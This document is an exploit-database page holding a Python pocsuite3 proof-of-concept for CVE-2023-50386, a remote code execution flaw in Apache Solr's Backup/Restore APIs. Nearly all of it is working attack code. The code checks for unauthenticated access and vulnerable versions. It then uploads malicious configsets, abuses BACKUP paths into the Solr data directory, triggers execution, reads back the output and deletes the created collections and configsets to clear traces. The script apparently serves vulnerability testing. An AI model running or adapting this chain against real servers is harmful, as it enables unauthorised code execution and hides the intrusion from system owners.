4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-50386.py PY
# -*- coding: utf-8 -*-
# @Time    : 2024/2/21 20:47
# @Author  : vvmdx
# @File    : CVE-2023-50386.py
# @Project : pocsuite3

"""
POC 先判断是否需要登录,再判断版本,如果无需登录且版本在影响范围内的话,开始实施攻击,最后清理痕迹
"""
import json
import re

from pocsuite3.api import VUL_TYPE, Output, POCBase, POC_CATEGORY, register_poc, requests

class SolrPOC(POCBase):
    """pocsuite3 plugin for CVE-2023-50386 (Apache Solr Backup/Restore APIs).

    ``_verify`` only fingerprints the target: it checks that the admin UI and
    the ZooKeeper admin endpoint answer without authentication and that the
    version advertised by the UI is inside the affected ranges.

    ``_attack`` drives the configset-upload / collection-backup request chain
    and afterwards issues the DELETE requests for the collection and
    configsets it names.
    """
    vulID = ''
    version = '1.0'
    author = ['vvmdx']
    vulDate = '2024-02-09'
    createDate = '2024-02-21'
    updateDate = '2024-02-28'
    references = ['https://solr.apache.org/security.html#cve-2023-50386-apache-solr-backuprestore-apis-allow-for-deployment-of-executables-in-malicious-configsets']
    name = 'Apache Solr Backup/Restore APIs 未授权访问导致远程代码执行(CVE-2023-50386)'
    appPowerLink = 'https://solr.apache.org/'
    appName = 'Apache Solr'
    appVersion = '6.0.0 through 8.11.2\n9.0.0 before 9.4.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = ''''''
    samples = [
    ]
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    pocDesc = ''' 验证模式下判断版本,攻击模式下代码执行 '''

    # User-Agent sent with every request issued by this plugin.
    _SOLR_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
    # The admin UI embeds the Solr version in the favicon cache-buster query.
    _SOLR_VERSION_RE = re.compile(r'href="img/favicon.ico\?_=(\d+\.\d+\.\d+)"')
    # Affected ranges as (inclusive lower bound, exclusive upper bound).
    _SOLR_AFFECTED_RANGES = (("6.0.0", "8.11.3"), ("9.0.0", "9.4.1"))

    def _solr_base_url(self):
        """Return the target URL without trailing slashes."""
        return self.url.rstrip("/")

    def _solr_headers(self, extra=None):
        """Return a fresh header dict with the User-Agent plus ``extra``."""
        headers = {"User-Agent": self._SOLR_USER_AGENT}
        if extra:
            headers.update(extra)
        return headers

    @staticmethod
    def _solr_json(resp):
        """Decode ``resp.text`` as a JSON object.

        Returns an empty dict when the body is not valid JSON or is not a
        JSON object, so callers can treat an unexpected reply (HTML error
        page, auth challenge, ...) as a failed step instead of crashing.
        """
        try:
            data = json.loads(resp.text)
        except ValueError:
            return {}
        return data if isinstance(data, dict) else {}

    def _verify(self):
        """Report the target as affected based on access checks and version.

        Returns:
            The ``Output`` built by ``parse_output``; it carries
            ``VerifyInfo.URL`` when both probes return 200 and the version
            found in the admin UI is inside an affected range.
        """
        result = {}
        base_url = self._solr_base_url()
        headers = self._solr_headers()
        solr_url = base_url + "/solr/"
        resp_solr = requests.get(solr_url, headers=headers, verify=False)
        zk_url = base_url + "/solr/admin/zookeeper"
        resp_zk = requests.get(zk_url, headers=headers, verify=False)
        # 1. Is the admin UI reachable without authentication?
        # 2. Is the instance running in cluster mode (ZooKeeper endpoint up)?
        if resp_solr.status_code != 200 or resp_zk.status_code != 200:
            return self.parse_output(result)
        # 3. Extract the version number from the admin page.
        match = self._SOLR_VERSION_RE.search(resp_solr.text)
        if match is None:
            return self.parse_output(result)
        version_str = match[1]
        # 4. Check the version against the affected ranges.
        affected = any(
            self.check_version(version_str, low, up)
            for low, up in self._SOLR_AFFECTED_RANGES
        )
        if affected:
            # 5. Inside an affected range: report the probed URL.
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = solr_url
        return self.parse_output(result)

    def get_version_tuple(self, version_str):
        """Convert a dotted version such as ``"8.11.2"`` to ``(8, 11, 2)``.

        Tuples compare element-wise, which gives numeric version ordering.

        Raises:
            ValueError: if a dot-separated component is not an integer.
        """
        return tuple(int(part) for part in version_str.split("."))

    def check_version(self, version_str, low_str, up_str):
        """Return True when ``low_str <= version_str < up_str`` numerically."""
        version = self.get_version_tuple(version_str)
        low = self.get_version_tuple(low_str)
        up = self.get_version_tuple(up_str)

        return low <= version < up

    def _attack(self):
        """Run the request chain, then clean up, and report the outcome.

        Returns:
            The ``Output`` built by ``parse_output``; it carries
            ``VerifyInfo.result`` when the chain yielded a value.
        """
        result = {}
        admin_url = self._solr_base_url() + "/solr/admin"
        exec_res = self._solr_run_chain(admin_url)
        if exec_res is not None:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['result'] = exec_res
        self._solr_cleanup(admin_url)
        return self.parse_output(result)

    def _solr_run_chain(self, admin_url):
        """Issue the upload/create/backup/create requests in order.

        Stops at the first step that does not report success.

        Returns:
            The ``java.library.path`` system property read back from
            ``/info/properties``, or ``None`` if any step failed or the
            reply did not have the expected shape.
        """
        # 1. Upload the first configset archive.
        upload_url = admin_url + "/configs?action=UPLOAD&name=conf1"
        if not self.upload(upload_url, "conf1.zip"):
            return None
        # 2. Create a collection that uses it.
        create_url = admin_url + "/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&wt=json&collection.configName=conf1"
        if not self.action(create_url):
            return None
        # 3. Backup, step one.
        backup_url_1 = admin_url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/&name=collection2_shard1_replica_n1"
        if not self.action(backup_url_1):
            return None
        # 4. Backup, step two: targets the directory written by step one.
        backup_url_2 = admin_url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/collection2_shard1_replica_n1&name=lib"
        if not self.action(backup_url_2):
            return None
        # 5. Upload the second configset archive.
        upload_url_2 = admin_url + "/configs?action=UPLOAD&name=conf2"
        if not self.upload(upload_url_2, "conf2.zip"):
            return None
        # 6. Trigger: create a second collection from conf2.
        headers = self._solr_headers()
        exec_url = admin_url + "/collections?action=CREATE&name=collection2&numShards=1&replicationFactor=1&wt=json&collection.configName=conf2"
        resp_exec = requests.get(exec_url, headers=headers, verify=False)
        # HTTP 400 from this CREATE is the condition for reading the result.
        if resp_exec.status_code != 400:
            return None
        # 7. Read the echoed output back from the system properties.
        read_url = admin_url + "/info/properties"
        resp_read = requests.get(read_url, headers=headers, verify=False)
        if resp_read.status_code != 200 or "root:" not in resp_read.text:
            return None
        properties = self._solr_json(resp_read).get('system.properties')
        if not isinstance(properties, dict):
            return None
        return properties.get('java.library.path')

    def _solr_cleanup(self, admin_url):
        """Delete ``collection1`` and, if that succeeds, both configsets.

        The collection has to be removed first; the order of the two
        configset deletions does not matter.

        NOTE(review): the deletes go by fixed name whether or not this run
        created the resources, and the configsets are left in place when the
        collection DELETE does not return 200 - confirm this is acceptable
        for the targets being tested.
        """
        headers = self._solr_headers()
        resp_del = requests.get(admin_url + "/collections?action=DELETE&name=collection1", headers=headers, verify=False)
        if resp_del.status_code == 200:
            requests.get(admin_url + "/configs?action=DELETE&name=conf1", headers=headers, verify=False)
            requests.get(admin_url + "/configs?action=DELETE&name=conf2", headers=headers, verify=False)

    def action(self, action_url):
        """GET a Collections API URL and report whether Solr accepted it.

        Returns:
            True only for HTTP 200 with ``responseHeader.status == 0`` and a
            top-level ``success`` key; False otherwise, including when the
            body is not JSON.
        """
        resp = requests.get(action_url, headers=self._solr_headers(), verify=False)
        if resp.status_code != 200:
            return False
        json_data = self._solr_json(resp)
        response_header = json_data.get('responseHeader')
        if not isinstance(response_header, dict):
            return False
        return response_header.get('status') == 0 and "success" in json_data

    def upload(self, upload_url, file_name):
        """POST the local file ``file_name`` as the raw request body.

        Returns:
            True only for HTTP 200 with ``responseHeader.status == 0``;
            False otherwise, including when the body is not JSON.

        Raises:
            OSError: if ``file_name`` cannot be opened.
        """
        headers = self._solr_headers({"Content-Type": "application/octet-stream"})
        with open(file_name, "rb") as file:
            # The zip's binary content is sent directly as the POST body.
            resp = requests.post(upload_url, headers=headers, data=file, verify=False)
        if resp.status_code != 200:
            return False
        response_header = self._solr_json(resp).get('responseHeader')
        if not isinstance(response_header, dict):
            return False
        return response_header.get('status') == 0

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Target is not vulnerable')
        return output


# Hand the POC class to pocsuite3's register_poc (presumably so the framework can discover and run it).
register_poc(SolrPOC)